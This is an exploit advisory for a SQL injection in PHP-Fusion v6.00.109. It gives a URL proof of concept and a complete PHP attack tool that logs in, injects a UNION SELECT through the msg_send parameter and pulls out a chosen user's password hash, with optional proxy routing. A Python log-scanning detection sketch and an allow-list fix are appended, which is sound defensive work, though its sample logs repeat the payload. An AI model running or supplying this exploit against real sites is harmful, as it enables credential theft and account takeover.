PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure

2005.09.29
Credit: rgod
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure

site: http://www.php-fusion.co.uk

- if magic_quotes is off -> SQL Injection, PoC:

http://[target]/[path_to_Php_Fusion]/messages.php?msg_send=' UNION SELECT user_password FROM fusion_users WHERE user_name='[admin_username]'/*

now the hash is shown in the "To:" field when you post a private message

this is the tool:

<?php
# 19.17 28/09/2005
#
# -- PhpF6_00_109xpl.php
#
# PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure
#
# by rgod
# site: http://rgod.altervista.org
#
# mphhh, private messages again...tze,tze
#
# make these changes in php.ini if you have troubles
# to launch this script:
# allow_call_time_pass_reference = on
# register_globals = on
#
# usage: launch this script from Apache, fill requested fields, then
# go!
#
# Sun-Tzu: "Therefore the clever combatant imposes his will on the enemy,
# but does not allow the enemy's will to be imposed on him"

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<head><title> *** PHP-Fusion v6.00.109 SQL Injection *** </title>
<meta http-equiv= "Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"><!--
body,td,th {color:#00FF00;}
body{background-color: #000000;}
.Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; font-style: italic; }
--> </style></head><body>
<p class="Stile6"> Php-Fusion v6.00.109 SQL Injection / admin|user credentials disclosure </p>
<p class="Stile6"> a script by rgod at <a href="http://rgod.altervista.org" target="_blank"> http://rgod.altervista.org</a></p>
<table width="84%"><tr><td width="43%">
<form name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host=value&port=value&proxy=value&user=value&pass=value&username=value">
<p> <input type="text" name="host"><span class="Stile5"> hostname ( ex: www.sitename.com ) </span></p>
<p> <input type="text" name="path"><span class="Stile5"> path (ex: /phpfusion/ or just /)</span></p>
<p> <input type="text" name="port"> <span class="Stile5">specify a port other than 80 (default value)</span></p>
<p> <input type="text" name="user"> <span class="Stile5">your username </span> </p>
<p> <input type="text" name="pass"> <span class="Stile5">your password ( to get a valid session cookie) </span></p>
<p><input type="text" name="username"> <span class="Stile5">user whom you want the password </span></p>
<p><input type="text" name="proxy"> <span class="Stile5"> send exploit trough an HTTP proxy </span> </p>
<p> <input type="submit"name="Submit" value="go!"> </p></form>
</td> </tr> </table></body></html>';

function show($headeri)
{
  $ii=0; $ji=0; $ki=0; $ci=0;
  echo '<table border="0"><tr>';
  while ($ii <= strlen($headeri)-1) {
    $datai=dechex(ord($headeri[$ii]));
    if ($ji==16) {
      $ji=0;
      $ci++;
      echo "<td> </td>";
      for ($li=0; $li<=15; $li++) {
        echo "<td>".$headeri[$li+$ki]."</td>";
      }
      $ki=$ki+16;
      echo "</tr><tr>";
    }
    if (strlen($datai)==1) {echo "<td>0".$datai."</td>";}
    else {echo "<td>".$datai."</td> ";}
    $ii++;
    $ji++;
  }
  for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
    echo "<td> </td>";
  }
  for ($li=$ci*16; $li<=strlen($headeri); $li++) {
    echo "<td>".$headeri[$li]."</td>";
  }
  echo "</tr></table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}\b)';

function sendpacket()
{
  global $proxy, $host, $port, $html, $packet;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
  }
  else {
    if (!eregi($proxy_regex,$proxy)) {
      echo htmlentities($proxy).' -> not a valid proxy...';
      die;
    }
    $parts=explode(':',$proxy);
    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';
      die;
    }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,2048);
    }
  }
  fclose($ock);
  echo nl2br(htmlentities($html));
}

if (($path<>'') and ($host<>'') and ($user<>'') and ($pass<>'') and ($username<>''))
{
  if ($port=='') {$port=80;}

  #STEP 1 -> login, to retrieve a session cookie...
  $data="user_name=".urlencode(trim($user))."&user_pass=".urlencode(trim($pass))."&login=Login";
  if ($proxy=='') {$packet="POST ".$path."news.php HTTP/1.1\r\n";}
  else {$packet="POST http://".$host.$path."news.php HTTP/1.1\r\n";}
  $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
  $packet.="Referer: http://".$host.$path."/news.php\r\n";
  $packet.="Accept-Language: en\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Accept-Encoding: gzip, deflate\r\n";
  $packet.="User-Agent: Googlebot/2.1\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: Keep-Alive\r\n";
  $packet.="Cache-Control: no-cache\r\n";
  $packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n";
  $packet.=$data;
  show($packet);
  sendpacket($packet);
  $temp=explode("Set-Cookie: ",$html);
  $temp2=explode(' ',$temp[1]);
  $cookie=$temp2[0];
  echo '<br>Your cookie: '.htmlentities($cookie);

  # STEP 2 -> SQL Injection, now retrieve the MD5 password hash from database
  $username=str_replace("'","",$username);
  $sql="' UNION SELECT user_password FROM fusion_users WHERE user_name='".trim($username)."'/*";
  if ($proxy=='') {$packet="GET ".$path."messages.php?msg_send=".urlencode($sql)." HTTP/1.1\r\n";}
  else {$packet="GET http://".$host.$path."messages.php?msg_send=".urlencode($sql)." HTTP/1.1\r\n";}
  $packet.="User-Agent: GameBoy, Powered by Nintendo\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
  $packet.="Accept-Language: en\r\n";
  $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n";
  $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n";
  $packet.="Cookie: ".$cookie."\r\n";
  $packet.="Cookie2: \$Version=1\r\n";
  $packet.="Connection: Keep-Alive, TE\r\n";
  $packet.="TE: deflate, gzip, chunked, identity, trailers\r\n\r\n";
  show($packet);
  sendpacket($packet);
  if (eregi('For Members only',$html)) {
    echo 'You have to specify a valid session cookie...';
    die;
  }
  $temp=explode("'Click to view the senders profile'>",$html);
  $temp2=explode("</a>",$temp[1]);
  $hash=$temp2[0];
  echo '<br>Username: '.htmlentities($username).' Password hash: '.$hash;
}
else {
  echo '<br> Fill requested fields, optionally specify a proxy...';
}
?>

rgod
site: http://rgod.altervista.org
mail: retrogod (at) aliceposta (dot) it
original advisory: http://rgod.altervista.org/phpfusion600109.html

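Detection sketch for the request described in the advisory above (an added example, not part of rgod's advisory or of PHP-Fusion): it scans web server access logs for messages.php requests whose msg_send value is not a plain number. It assumes msg_send normally carries a numeric user id and that logs are in Apache combined format; the log lines and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [29/Sep/2005:10:01:02 +0200] "GET /fusion/messages.php?msg_send=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [29/Sep/2005:10:02:41 +0200] "GET /fusion/messages.php?msg_send=%27+UNION+SELECT+user_password+FROM+fusion_users+WHERE+user_name%3D%27admin%27%2F%2A HTTP/1.1" 200 5344 "-" "GameBoy, Powered by Nintendo"
203.0.113.7 - - [29/Sep/2005:10:03:10 +0200] "GET /fusion/news.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
198.51.100.4 - - [29/Sep/2005:10:04:55 +0200] "GET /fusion/messages.php?msg_send=3%2527%2520union HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Client address and request target; urlsplit() below also copes with the
# absolute-URL form ("GET http://host/path ...") that a proxied request uses.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Secondary signal only: SQL-looking fragments in the decoded value.
SQL_HINT = re.compile(r"union\s+select|'|/\*|--", re.IGNORECASE)


def suspicious_msg_send(log_text):
    """Return (client_ip, decoded_value, sql_like) for every messages.php
    request whose msg_send is not purely digits (allow-list check)."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/messages.php"):
            continue
        # parse_qs URL-decodes once, as the web server would.
        for value in parse_qs(url.query, keep_blank_values=True).get("msg_send", []):
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((m.group("ip"), value, bool(SQL_HINT.search(value))))
    return hits


if __name__ == "__main__":
    for ip, value, sql_like in suspicious_msg_send(SAMPLE_LOG):
        print(f"{ip}\tsql_like={sql_like}\t{value!r}")
```

The last sample line is double-encoded, so the keyword hint misses it while the digits-only check still flags it; the same allow-list check (or an integer cast) applied server-side to msg_send before it reaches the query removes the dependency on magic_quotes.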
